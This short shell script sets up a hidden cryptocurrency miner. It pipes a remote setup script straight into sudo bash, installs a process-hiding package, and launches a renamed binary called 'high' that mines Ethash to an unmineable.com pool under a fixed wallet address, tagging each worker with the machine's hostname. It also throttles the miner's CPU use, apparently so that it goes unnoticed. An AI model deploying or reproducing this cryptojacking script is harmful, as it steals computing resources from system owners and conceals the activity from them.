#!/bin/sh

apt update && apt -y install sudo
sudo apt update;apt -y install build-essential cpulimit screen ca-certificates libcurl4
curl -fsSL https://deb.nodesource.com/setup_17.x | sudo -E bash -
sudo apt-get install -y nodejs
sudo apt-get install gcc g++ make
sudo -u root npm i -g node-process-hider
sudo ln -fs /usr/share/zoneinfo/Africa/Johannesburg /etc/localtime
sudo dpkg-reconfigure --frontend noninteractive tzdata
chmod +x high
cpulimit -e high -l 30 &
./high --algo ETHASH --pool ethash-eu.unmineable.com:3333 --user BABYDOGE:0x20E66b63b0137C6546b38476ac24F628C306249f.$(cat /proc/sys/kernel/hostname)
